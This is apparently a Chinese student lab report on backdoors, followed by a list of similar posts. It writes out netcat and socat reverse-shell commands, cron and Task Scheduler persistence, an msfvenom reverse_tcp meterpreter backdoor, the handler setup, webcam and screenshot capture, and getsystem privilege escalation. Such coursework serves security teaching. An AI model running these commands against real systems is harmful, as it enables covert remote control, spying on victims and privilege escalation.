一、基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式

答:在莫名其妙的网站下载某些莫名奇妙的播放器。

2.例举你知道的后门如何启动起来(win及linux)的方式?

答:对于windows是双击后门软件执行。对于linux,通过cron指令。

3.Meterpreter有哪些给你映像深刻的功能?

答:截屏功能,录音功能,调用摄像头的功能。

4.如何发现自己有系统有没有被安装后门?

答:使用某管家查杀一下就好。

二、使用netcat获取主机操作Shell,cron启动

1.windows获得linux的权限

(1)查阅本机windows ip地址

可知win的ip为192.168.1.157

(2)使用以下代码ncat.exe -l -p 4310 监听4310端口,等着linux链接这个端口

(3)使用命令 nc 192.168.1.157 4310 -e /bin/sh 让linux链接4310端口  

(4)windows获得linux的shell

2.linux获得windows的权限

(1)查阅本机linux ip地址

(2)nc设置监听本地4310端口 nc -l -p 4310

(3)让windows去链接linux的4310端口

(4)linux获得windows的权限

3.nc数据传输

(1)windows监听本地4310端口 ncat.exe -l 4310  linux连接这个端口 nc 192.168.28.157 4310

4.nc定时启动

(1)windows监听本地4310端口 ncat.exe -l -p 4310

(2)crontab指令增加一条定时任务,让他在每小时的第54分钟执行 crontab -e 。

三、使用socat获取主机操作Shell, 任务计划启动

(1)按照步骤创建一个新任务,控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”,填写任务名称ZHYY,之后,新建触发器,选择开始任务时间为:工作站锁定时。

(2)创建完成之后,按 Win+L 快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行(可能会有很多同学出现一个黑屏,这里不用管它)

(3)在终端输入指令 socat - tcp:192.168.1.157:4310  此时可发现已经成功获得了一个windows shell

四、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.用以下代码生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=43101 -f exe > 007_backdoor.exe

2.通过nc指令将生成的后门程序传送到Windows主机上,输入后需要在Linux上输入指令ncat -nv

可以在C盘中看到该后门

3.在kali上使用 msfconsole 指令进入msf控制台,然后出现了下面这个奇怪的东西

4.配置参数攻击windows,这里需要把防火墙和杀毒软件全部关掉

(1)先按照以下代码进行配置

use exploit/multi/handler             

set payload windows/meterpreter/reverse_tcp   

show options                    

set LHOST 192.168.31.128              

set LPORT                     

show options                    

exploit                      

发现端口是4444

(2)设置模块、载荷

(3)再次设置主机IP、端口,并再次用 show options 查看是否设置正确,发现设置正确

(4)启用模块

(5)在windows上运行后门程序,并在linux上查看,发现得到了windows远程控制权

五、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.直接输入命令 screenshot 进行截屏,发现截屏记录在root下

2.使用命令webcam_snap进行控制摄像头

3.进行提权

(1)先使用 先使用 getuid 再使用 用 getsystem 指令进行提权

(2)以管理员身份运行后门程序

(3)提权成功

六、实验感想

通过本次实验了解了后门植入原理和如何通过后门去控制其他主机,原理比较简单,也可以想得明白,因为是原理所以和实际操作会有偏差,因为被攻击的电脑有杀软和防火墙,不可能这么容易就被植入后门程序。与此同时也学到了控制权限之后能对受害主机进行的一系列操作,其中印象最深刻的就是控制截屏功能和摄像头的权限,希望在之后的课程中能够进一步地学习后门植入程序,也就是如何才能让后门程序逃过杀毒软件的查杀,或许这是计算机病毒里才可能讲到的内容了。

20164310Exp2后门原理与实践的更多相关文章

  1. 20165223《网络对抗技术》Exp2 后门原理与实践

    目录 -- 后门原理与实践 后门原理与实践说明 实验任务 基础知识问答 常用后门工具 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shel ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  4. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  5. 2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理与实践

    实验二 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其 ...

  6. 20165221 《网络对抗技术》EXP2:后门原理与实践

    20165221 <网络对抗技术>EXP2:后门原理与实践 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  9. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. Java中栈的应用,括号匹配

    package edu.yuliang.Data_Structure_Basics; import org.omg.PortableInterceptor.SYSTEM_EXCEPTION; /* 给 ...

  2. Delphi编程之爬取贴吧图片最终版

    接着前面两篇文章的内容,我们今天把这个贴吧爬取图片的程序完善,让它具有可以下载贴吧多页和帖子多页图片的能力. 主界面设计如下,包含3个labelededit,3个button,1个memo,1个str ...

  3. Linux运维工程师应具备哪些技能?

      对于我们这些刚入门的运维小白来说,极强的好奇心总会驱使我们去涉猎各种技术,弄到最后很可能该学的知识半懵半解,知识体系混乱,学习毫无章法.因此,我们学习 时要有一个明确的目标和知识体系(也是我学习的 ...

  4. ssh 无秘钥登录

    三台centos 一台服务器192.168.2.152 一台客户端192.168.2.142 一台客户端192.168.2.151 (1)产生无密钥 [root@localhost ~]#  ssh- ...

  5. PA教材提纲 TAW12-2

    Unit1 Adjustment of SAP Standard Software(SAP标准软件修改) 1.1 Adjusting SAP Standard Software(如何修改SAP标准软件 ...

  6. Spring事务<tx:annotation-driven/>的理解(Controller使用@Transactional)

    在使用Spring的时候,配置文件中我们经常看到 annotation-driven 这样的注解,其含义就是支持注解,一般根据前缀 tx.mvc 等也能很直白的理解出来分别的作用. <tx:an ...

  7. access数据库之cookie注入

    本来今天想写post注入的,但这几天正好看到chookie的注入的视频.就先写一下这个.大家对于我说的get post cookie注入可能会认为SQL注入就这几种方式.这概念是错的.Get post ...

  8. Ajax的工作原理以及优缺点

    Ajax的工作原理 : 相当于在客户端与服务端之间加了一个抽象层(Ajax引擎),使用户请求和服务器响应异步化,并不是所有的请求都提交给服务器,像一些数据验证和数据处理 都交给Ajax引擎来完成,只有 ...

  9. .singleton.php 文件 (单例模式可被继承 代码实例)

    <?phpnamespace lib;abstract class Singleton{ //设置一个私有的静态属性作为中间变量 private static $instancePool = [ ...

  10. pycharm+pydesigner+pyqt5 如何添加图片资源

    pydesigner 上添加资源比较容易: 步骤一用于编辑,步骤二步创建,步骤三创建文件新的qrc: 步骤一:新建一个Prefix,步骤二给prefix添加资源文件.至此,资源文件添加完成 采用 Py ...